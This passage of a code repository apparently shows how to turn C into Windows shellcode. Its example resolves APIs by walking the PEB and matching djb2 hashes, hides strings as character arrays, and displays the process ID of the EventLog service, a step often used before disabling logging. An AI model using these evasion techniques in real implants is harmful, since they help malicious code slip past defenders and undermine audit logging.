HASH_STRSTRA 0xfb62238 31 | 32 | typedef PCSTR(WINAPI* STRSTRA)(PCSTR, PCSTR); 33 | 34 | // ---- Ole32.dll ---- 35 | #define HASH_OLE32 0xf92c2394 36 | #define HASH_CONITIALIZEEX 0xc1cd8ee6 37 | #define HASH_COCREATEINSTANCE 0xbecc6920 38 | #define HASH_COTASKMEMFREE 0xe4f194ab 39 | #define HASH_COUNINITIALIZE 0x145f84c 40 | #define HASH_COINITIALIZESECURITY 0x428dffe1 41 | 42 | typedef HRESULT(WINAPI* COINITIALIZEEX)(LPVOID, DWORD); 43 | typedef HRESULT(WINAPI* COCREATEINSTANCE)(REFCLSID, LPUNKNOWN, DWORD, REFIID, LPVOID*); 44 | typedef void(WINAPI* COTASKMEMFREE)(LPVOID); 45 | typedef void(WINAPI* COUNINITIALIZE)(); 46 | typedef HRESULT (WINAPI* COINITIALIZESECURITY)( PSECURITY_DESCRIPTOR, LONG, SOLE_AUTHENTICATION_SERVICE*, void*, DWORD , DWORD ,void* , DWORD , void* ); 47 | 48 | // ---- Oleaut32.dll ---- 49 | #define HASH_OLEAUT32 0xe6ab711e 50 | #define HASH_SYSALLOCSTRING 0x785668a6 51 | #define HASH_SYSFREESTRING 0x8d88867d 52 | 53 | typedef BSTR(WINAPI* SYSALLOCSTRING)(OLECHAR FAR*); 54 | typedef void(WINAPI* SYSFREESTRING)(BSTR); 55 | 56 | typedef struct _UNICODE_STR { 57 | USHORT Length; 58 | USHORT MaximumLength; 59 | PWSTR pBuffer; 60 | } UNICODE_STR, * PUNICODE_STR; 61 | 62 | typedef struct _PEB_LDR_DATA 63 | { 64 | DWORD dwLength; 65 | DWORD dwInitialized; 66 | LPVOID lpSsHandle; 67 | LIST_ENTRY InLoadOrderModuleList; 68 | LIST_ENTRY InMemoryOrderModuleList; 69 | LIST_ENTRY InInitializationOrderModuleList; 70 | LPVOID lpEntryInProgress; 71 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 72 | 73 | typedef struct _LDR_DATA_TABLE_ENTRY 74 | { 75 | LIST_ENTRY InMemoryOrderModuleList; 76 | LIST_ENTRY InInitializationOrderModuleList; 77 | PVOID DllBase; 78 | PVOID EntryPoint; 79 | ULONG SizeOfImage; 80 | UNICODE_STR FullDllName; 81 | UNICODE_STR BaseDllName; 82 | ULONG Flags; 83 | SHORT LoadCount; 84 | SHORT TlsIndex; 85 | LIST_ENTRY HashTableEntry; 86 | ULONG TimeDateStamp; 87 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 88 | 89 | //redefine PEB_FREE_BLOCK struct 90 | typedef struct _PEB_FREE_BLOCK 91 | { 92 | struct _PEB_FREE_BLOCK* pNext; 93 | DWORD dwSize; 94 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 95 | 96 | //redefine PEB struct 97 | typedef struct __PEB 98 | { 99 | BYTE bInheritedAddressSpace; 100 | BYTE bReadImageFileExecOptions; 101 | BYTE bBeingDebugged; 102 | BYTE bSpareBool; 103 | LPVOID lpMutant; 104 | LPVOID lpImageBaseAddress; 105 | PPEB_LDR_DATA pLdr; 106 | LPVOID lpProcessParameters; 107 | LPVOID lpSubSystemData; 108 | LPVOID lpProcessHeap; 109 | PRTL_CRITICAL_SECTION pFastPebLock; 110 | LPVOID lpFastPebLockRoutine; 111 | LPVOID lpFastPebUnlockRoutine; 112 | DWORD dwEnvironmentUpdateCount; 113 | LPVOID lpKernelCallbackTable; 114 | DWORD dwSystemReserved; 115 | DWORD dwAtlThunkSListPtr32; 116 | PPEB_FREE_BLOCK pFreeList; 117 | DWORD dwTlsExpansionCounter; 118 | LPVOID lpTlsBitmap; 119 | DWORD dwTlsBitmapBits[2]; 120 | LPVOID lpReadOnlySharedMemoryBase; 121 | LPVOID lpReadOnlySharedMemoryHeap; 122 | LPVOID lpReadOnlyStaticServerData; 123 | LPVOID lpAnsiCodePageData; 124 | LPVOID lpOemCodePageData; 125 | LPVOID lpUnicodeCaseTableData; 126 | DWORD dwNumberOfProcessors; 127 | DWORD dwNtGlobalFlag; 128 | LARGE_INTEGER liCriticalSectionTimeout; 129 | DWORD dwHeapSegmentReserve; 130 | DWORD dwHeapSegmentCommit; 131 | DWORD dwHeapDeCommitTotalFreeThreshold; 132 | DWORD dwHeapDeCommitFreeBlockThreshold; 133 | DWORD dwNumberOfHeaps; 134 | DWORD dwMaximumNumberOfHeaps; 135 | LPVOID lpProcessHeaps; 136 | LPVOID lpGdiSharedHandleTable; 137 | LPVOID lpProcessStarterHelper; 138 | DWORD dwGdiDCAttributeList; 139 | LPVOID lpLoaderLock; 140 | DWORD dwOSMajorVersion; 141 | DWORD dwOSMinorVersion; 142 | WORD wOSBuildNumber; 143 | WORD wOSCSDVersion; 144 | DWORD dwOSPlatformId; 145 | DWORD dwImageSubsystem; 146 | DWORD dwImageSubsystemMajorVersion; 147 | DWORD dwImageSubsystemMinorVersion; 148 | DWORD dwImageProcessAffinityMask; 149 | DWORD dwGdiHandleBuffer[34]; 150 | LPVOID lpPostProcessInitRoutine; 151 | LPVOID lpTlsExpansionBitmap; 152 | DWORD dwTlsExpansionBitmapBits[32]; 153 | DWORD dwSessionId; 154 | ULARGE_INTEGER liAppCompatFlags; 155 | ULARGE_INTEGER liAppCompatFlagsUser; 156 | LPVOID lppShimData; 157 | LPVOID lpAppCompatInfo; 158 | UNICODE_STR usCSDVersion; 159 | LPVOID lpActivationContextData; 160 | LPVOID lpProcessAssemblyStorageMap; 161 | LPVOID lpSystemDefaultActivationContextData; 162 | LPVOID lpSystemAssemblyStorageMap; 163 | DWORD dwMinimumStackCommit; 164 | } _PEB, * _PPEB; 165 | -------------------------------------------------------------------------------- /WMI_get_pid_service_evt/ApiResolve.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | static uint64_t getDllBase(unsigned long); 4 | static uint64_t loadDll(unsigned long); 5 | static uint64_t loadDll_byName(char*); 6 | static uint64_t parseHdrForPtr(uint64_t, unsigned long); 7 | static uint64_t followExport(char*, unsigned long); 8 | 9 | static unsigned long djb2(unsigned char*); 10 | static unsigned long unicode_djb2(const wchar_t* str); 11 | static WCHAR* toLower(WCHAR* str); 12 | 13 | uint64_t 14 | getFunctionPtr(unsigned long dll_hash, unsigned long function_hash) { 15 | 16 | uint64_t dll_base = 0x00; 17 | uint64_t ptr_function = 0x00; 18 | 19 | dll_base = getDllBase(dll_hash); 20 | if (dll_base == 0) { 21 | dll_base = loadDll(dll_hash); 22 | if (dll_base == 0) 23 | return FAIL; 24 | } 25 | 26 | ptr_function = parseHdrForPtr(dll_base, function_hash); 27 | 28 | return ptr_function; 29 | 30 | } 31 | 32 | static uint64_t 33 | loadDll(unsigned long dll_hash) { 34 | 35 | uint64_t kernel32_base = 0x00; 36 | uint64_t fptr_loadLibary = 0x00; 37 | uint64_t ptr_loaded_dll = 0x00; 38 | 39 | kernel32_base = getDllBase(HASH_KERNEL32); 40 | if (kernel32_base == 0x00) 41 | return FAIL; 42 | 43 | fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA); 44 | if (fptr_loadLibary == 0x00) 45 | return FAIL; 46 | 47 | if (dll_hash == HASH_USER32) { 48 | char dll_name[] = { 'U', 's', 'e', 'r', '3' ,'2' ,'.', 'd', 'l', 'l', 0x00 }; 49 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 50 | } else if (dll_hash == HASH_OLE32) { 51 | char dll_name[] = { 'O', 'l', 'e', '3', '2', '.', 'd','l','l',0x00 }; 52 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 53 | } else if (dll_hash == HASH_OLEAUT32) { 54 | char dll_name[] = { 'o', 'l', 'e', 'a', 'u', 't', '3','2', '.', 'd','l','l',0x00 }; 55 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 56 | } else if (dll_hash == HASH_SHLWAPI) { 57 | char dll_name[] = { 'S', 'h', 'l', 'w', 'a', 'p', 'i', '.', 'd','l','l',0x00 }; 58 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 59 | } 60 | 61 | return ptr_loaded_dll; 62 | 63 | } 64 | 65 | static uint64_t 66 | loadDll_byName(char* dll_name) { 67 | 68 | uint64_t kernel32_base = 0x00; 69 | uint64_t fptr_loadLibary = 0x00; 70 | uint64_t ptr_loaded_dll = 0x00; 71 | 72 | kernel32_base = getDllBase(HASH_KERNEL32); 73 | if (kernel32_base == 0x00) 74 | return FAIL; 75 | 76 | fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA); 77 | if (fptr_loadLibary == 0x00) 78 | return FAIL; 79 | 80 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 81 | 82 | return ptr_loaded_dll; 83 | 84 | } 85 | 86 | 87 | static uint64_t 88 | parseHdrForPtr(uint64_t dll_base, unsigned long function_hash) { 89 | 90 | PIMAGE_NT_HEADERS nt_hdrs = NULL; 91 | PIMAGE_DATA_DIRECTORY data_dir = NULL; 92 | PIMAGE_EXPORT_DIRECTORY export_dir = NULL; 93 | 94 | uint32_t* ptr_exportadrtable = 0x00; 95 | uint32_t* ptr_namepointertable = 0x00; 96 | uint16_t* ptr_ordinaltable = 0x00; 97 | 98 | uint32_t idx_functions = 0x00; 99 | 100 | unsigned char* ptr_function_name = NULL; 101 | 102 | 103 | nt_hdrs = (PIMAGE_NT_HEADERS)(dll_base + (uint64_t)((PIMAGE_DOS_HEADER)(size_t)dll_base)->e_lfanew); 104 | data_dir = (PIMAGE_DATA_DIRECTORY)&nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 105 | export_dir = (PIMAGE_EXPORT_DIRECTORY)(dll_base + (uint64_t)data_dir->VirtualAddress); 106 | 107 | ptr_exportadrtable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfFunctions); 108 | ptr_namepointertable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfNames); 109 | ptr_ordinaltable = (uint16_t*)(dll_base + (uint64_t)export_dir->AddressOfNameOrdinals); 110 | 111 | for (idx_functions = 0; idx_functions < export_dir->NumberOfNames; idx_functions++) { 112 | 113 | ptr_function_name = (unsigned char*)dll_base + (ptr_namepointertable[idx_functions]); 114 | if (djb2(ptr_function_name) == function_hash) { 115 | 116 | WORD nameord = ptr_ordinaltable[idx_functions]; 117 | DWORD rva = ptr_exportadrtable[nameord]; 118 | 119 | 120 | if (dll_base + rva >= dll_base + data_dir->VirtualAddress && dll_base + rva <= dll_base + data_dir->VirtualAddress + (uint64_t)data_dir->Size) { 121 | // This is a forwarded export 122 | 123 | char* ptr_forward = (char*)(dll_base + rva); 124 | return followExport(ptr_forward, function_hash); 125 | 126 | } 127 | 128 | 129 | return dll_base + rva; 130 | } 131 | 132 | } 133 | 134 | return FAIL; 135 | } 136 | 137 | static uint64_t followExport(char* ptr_forward, unsigned long function_hash) { 138 | 139 | uint64_t _StrStrA = getFunctionPtr(HASH_SHLWAPI, HASH_STRSTRA); 140 | 141 | if (_StrStrA == 0x00) 142 | return FAIL; 143 | 144 | char del[] = { '.', 0x00 }; 145 | char forward_dll[MAX_PATH] = { 0 }; 146 | uint8_t i = 0; 147 | uint64_t fwd_dll_base = 0x00, forwarded_export = 0x00; 148 | 149 | while (*ptr_forward) 150 | forward_dll[i++] = *ptr_forward++; 151 | 152 | *(char*)((STRSTRA)_StrStrA)(forward_dll, del) = 0x00; 153 | 154 | fwd_dll_base = getDllBase(djb2((unsigned char*)forward_dll)); 155 | if (fwd_dll_base == 0x00) { 156 | fwd_dll_base = loadDll_byName(forward_dll); 157 | if (fwd_dll_base == 0x00) 158 | return FAIL; 159 | } 160 | 161 | forwarded_export = parseHdrForPtr(fwd_dll_base, function_hash); 162 | 163 | return forwarded_export; 164 | 165 | } 166 | 167 | static uint64_t 168 | getDllBase(unsigned long dll_hash) { 169 | 170 | _PPEB ptr_peb = NULL; 171 | PPEB_LDR_DATA ptr_ldr_data = NULL; 172 | PLDR_DATA_TABLE_ENTRY ptr_module_entry = NULL, ptr_start_module = NULL; 173 | PUNICODE_STR dll_name = NULL; 174 | 175 | ptr_peb = (_PEB*)__readgsqword(0x60); 176 | ptr_ldr_data = ptr_peb->pLdr; 177 | ptr_module_entry = ptr_start_module = (PLDR_DATA_TABLE_ENTRY)ptr_ldr_data->InMemoryOrderModuleList.Flink; 178 | 179 | do { 180 | 181 | dll_name = &ptr_module_entry->BaseDllName; 182 | 183 | if (dll_name->pBuffer == NULL) 184 | return FAIL; 185 | 186 | if (unicode_djb2(toLower(dll_name->pBuffer)) == dll_hash) 187 | return (uint64_t)ptr_module_entry->DllBase; 188 | 189 | ptr_module_entry = (PLDR_DATA_TABLE_ENTRY)ptr_module_entry->InMemoryOrderModuleList.Flink; 190 | 191 | } while (ptr_module_entry != ptr_start_module); 192 | 193 | return FAIL; 194 | 195 | } 196 | 197 | static unsigned long 198 | djb2(unsigned char* str) 199 | { 200 | unsigned long hash = 5381; 201 | int c; 202 | 203 | while ((c = *str++)) 204 | hash = ((hash << 5) + hash) + c; 205 | 206 | return hash; 207 | } 208 | 209 | unsigned long 210 | unicode_djb2(const wchar_t* str) 211 | { 212 | 213 | unsigned long hash = 5381; 214 | DWORD val; 215 | 216 | while (*str != 0) { 217 | val = (DWORD)*str++; 218 | hash = ((hash << 5) + hash) + val; 219 | } 220 | 221 | return hash; 222 | 223 | } 224 | 225 | static WCHAR* 226 | toLower(WCHAR* str) 227 | { 228 | 229 | WCHAR* start = str; 230 | 231 | while (*str) { 232 | 233 | if (*str <= L'Z' && *str >= 'A') { 234 | *str += 32; 235 | } 236 | 237 | str += 1; 238 | 239 | } 240 | 241 | return start; 242 | 243 | } -------------------------------------------------------------------------------- /WMI_get_pid_service_evt/WMI_get_pid_service_evt.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/WMI_get_pid_service_evt/WMI_get_pid_service_evt.bin -------------------------------------------------------------------------------- /WMI_get_pid_service_evt/WMI_get_pid_service_evt.c: -------------------------------------------------------------------------------- 1 | #include "windows.h" 2 | #include "stdint.h" 3 | #include "wbemidl.h" 4 | #include "shobjidl.h" 5 | 6 | #include "APIResolve.h" 7 | 8 | #ifdef _DEBUG 9 | int 10 | main(int argc, char** argv) { 11 | #else 12 | int go() { 13 | #endif 14 | 15 | COINITIALIZEEX _CoInitializeEx = (COINITIALIZEEX)getFunctionPtr(HASH_OLE32, HASH_CONITIALIZEEX); 16 | COCREATEINSTANCE _CoCreateinstance = (COCREATEINSTANCE)getFunctionPtr(HASH_OLE32, HASH_COCREATEINSTANCE); 17 | COINITIALIZESECURITY _CoInitializeSecurity = (COINITIALIZESECURITY)getFunctionPtr(HASH_OLE32, HASH_COINITIALIZESECURITY); 18 | COUNINITIALIZE _CoUnitialize = (COUNINITIALIZE)getFunctionPtr(HASH_OLE32, HASH_COUNINITIALIZE); 19 | SYSALLOCSTRING _SysAllocString = (SYSALLOCSTRING)getFunctionPtr(HASH_OLEAUT32, HASH_SYSALLOCSTRING); 20 | SYSFREESTRING _SysFreeString = (SYSFREESTRING)getFunctionPtr(HASH_OLEAUT32, HASH_SYSFREESTRING); 21 | LSTRCMPW _lstrcmpw = (LSTRCMPW)getFunctionPtr(HASH_KERNEL32, HASH_LSTRCMPW); 22 | 23 | WSPRINTFA _wsprintfA = (WSPRINTFA)getFunctionPtr(HASH_USER32, HASH_WSPRINTFA); 24 | MESSAGEBOXA _MessageBoxA = (MESSAGEBOXA)getFunctionPtr(HASH_USER32, HASH_MESSAGEBOXA); 25 | 26 | if (_CoInitializeEx == 0x00 || _CoCreateinstance == 0x00 || _CoInitializeSecurity == 0x00 || _CoUnitialize == 0x00 || _SysAllocString == 0x00 || _SysFreeString == 0x00 || 27 | _lstrcmpw == NULL || _MessageBoxA == 0x00 || _wsprintfA == 0x00) 28 | return FAIL; 29 | 30 | GUID _CLSID_WbemLocator = { 0x4590f811, 0x1d3a, 0x11d0 , { 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24 } }; 31 | IID _IID_IWbemLocator = { 0xdc12a687, 0x737f, 0x11cf , { 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24 } }; 32 | wchar_t w_server[] = {'R', 'O', 'O', 'T', '\\', 'C', 'I', 'M', 'V', '2', 0x00}; 33 | wchar_t w_wql[] = { 'W', 'Q', 'L', 0x00 }; 34 | wchar_t w_query[] = { 's', 'e', 'l', 'e', 'c', 't', ' ', 'n', 'a', 'm', 'e', ',', 'p', 'r', 'o', 'c', 'e', 's', 's', 'i', 'd', ' ', 'f', 'r' ,'o', 'm', 35 | ' ', 'W', 'i', 'n', '3','2','_', 'S', 'e','r','v', 'i','c','e', 0x00 }; 36 | wchar_t w_nameservice[] = { 'E', 'v', 'e', 'n', 't', 'L', 'o', 'g', 0x00 }; 37 | wchar_t w_column_name[] = { 'n', 'a', 'm', 'e', 0x00 }; 38 | wchar_t w_column_processid[] = {'p' , 'r', 'o', 'c', 'e', 's', 's' , 'i', 'd', 0x00}; 39 | 40 | BSTR bstr_server = NULL; 41 | BSTR bstr_wql = NULL; 42 | BSTR bstr_query = NULL; 43 | 44 | HRESULT h_res = 0; 45 | IWbemLocator* p_loc = NULL; 46 | IWbemServices* p_svc = NULL; 47 | IEnumWbemClassObject* p_enumerator = NULL; 48 | IWbemClassObject* p_cls_obj = NULL; 49 | VARIANT vt_prop; 50 | ULONG u_return = 0x00; 51 | DWORD dw_success = FAIL; 52 | uint32_t pid_eventservice = 0x00; 53 | 54 | bstr_server = _SysAllocString(w_server); 55 | bstr_wql = _SysAllocString(w_wql); 56 | bstr_query = _SysAllocString(w_query); 57 | 58 | if (bstr_server == NULL || bstr_wql == NULL || bstr_query == NULL) 59 | goto cleanup; 60 | 61 | h_res = _CoInitializeEx(0, COINIT_MULTITHREADED); 62 | if (FAILED(h_res)) 63 | return FAIL; 64 | 65 | h_res = _CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL); 66 | if (FAILED(h_res)) 67 | goto cleanup; 68 | 69 | h_res = _CoCreateinstance(&_CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, &_IID_IWbemLocator, (LPVOID*)&p_loc); 70 | if (FAILED(h_res)) 71 | goto cleanup; 72 | 73 | h_res = p_loc->lpVtbl->ConnectServer(p_loc, bstr_server, NULL, NULL, 0, 0, 0, 0, &p_svc); 74 | if (FAILED(h_res)) 75 | goto cleanup; 76 | 77 | h_res = p_svc->lpVtbl->ExecQuery(p_svc, bstr_wql, bstr_query, WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &p_enumerator); 78 | if (FAILED(h_res)) 79 | goto cleanup; 80 | 81 | while (p_enumerator) { 82 | 83 | h_res = p_enumerator->lpVtbl->Next(p_enumerator, WBEM_INFINITE, 1, &p_cls_obj, &u_return); 84 | if (FAILED(h_res)) 85 | goto cleanup; 86 | 87 | if (u_return == 0x00) 88 | break; 89 | 90 | h_res = p_cls_obj->lpVtbl->Get(p_cls_obj, w_column_name, 0, &vt_prop, 0, 0); 91 | if (FAILED(h_res)) 92 | goto cleanup; 93 | 94 | if (!_lstrcmpw(vt_prop.bstrVal, w_nameservice)) { 95 | 96 | h_res = p_cls_obj->lpVtbl->Get(p_cls_obj, w_column_processid, 0, &vt_prop, 0, 0); 97 | if (FAILED(h_res)) 98 | goto cleanup; 99 | 100 | pid_eventservice = vt_prop.lVal; 101 | 102 | char c_pid[512] = { 0x00 }; 103 | char c_fmt[] = { '0', 'x', '%', 'x', 0x00 }; 104 | 105 | _wsprintfA(c_pid, c_fmt, pid_eventservice); 106 | 107 | _MessageBoxA(0, c_pid, c_pid, 1); 108 | 109 | break; 110 | 111 | } 112 | 113 | } 114 | 115 | dw_success = SUCCESS; 116 | 117 | cleanup: 118 | 119 | if (p_svc != NULL) 120 | p_svc->lpVtbl->Release(p_svc); 121 | 122 | if (p_loc != NULL) 123 | p_loc->lpVtbl->Release(p_loc); 124 | 125 | if (p_enumerator != NULL) 126 | p_enumerator->lpVtbl->Release(p_enumerator); 127 | 128 | if (p_cls_obj != NULL) 129 | p_cls_obj->lpVtbl->Release(p_cls_obj); 130 | 131 | if (bstr_server != NULL) 132 | _SysFreeString(bstr_server); 133 | 134 | if (bstr_query != NULL) 135 | _SysFreeString(bstr_query); 136 | 137 | if (bstr_wql != NULL) 138 | _SysFreeString(bstr_wql); 139 | 140 | _CoUnitialize(); 141 | 142 | return dw_success; 143 | 144 | } -------------------------------------------------------------------------------- /WMI_get_pid_service_evt/adjuststack.asm: -------------------------------------------------------------------------------- 1 | ; Based on http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html and https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | extern go 3 | global alignstack 4 | 5 | segment .text 6 | 7 | alignstack: 8 | push rdi ; backup rdi since we will be using this as our main register 9 | mov rdi, rsp ; save stack pointer to rdi 10 | and rsp, byte -0x10 ; align stack with 16 bytes 11 | sub rsp, byte +0x20 ; allocate some space for our C function 12 | call go ; call the C function 13 | mov rsp, rdi ; restore stack pointer 14 | pop rdi ; restore rdi 15 | ret ; return where we left 16 | -------------------------------------------------------------------------------- /WMI_get_pid_service_evt/extract.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for i in $(objdump -d WMI_get_pid_service_evt.exe | grep "^ " | cut -f2); do echo -e -n "\x$i"; done >> WMI_get_pid_service_evt.bin 3 | -------------------------------------------------------------------------------- /WMI_get_pid_service_evt/makefile: -------------------------------------------------------------------------------- 1 | # based on https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | make: 3 | nasm -f win64 adjuststack.asm -o adjuststack.o 4 | x86_64-w64-mingw32-gcc ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,-Tlinker.ld,--no-seh 5 | x86_64-w64-mingw32-gcc WMI_get_pid_service_evt.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o WMI_get_pid_service_evt.o -Wl,-Tlinker.ld,--no-seh 6 | x86_64-w64-mingw32-ld -e go -s adjuststack.o ApiResolve.o WMI_get_pid_service_evt.o -o WMI_get_pid_service_evt.exe 7 | --------------------------------------------------------------------------------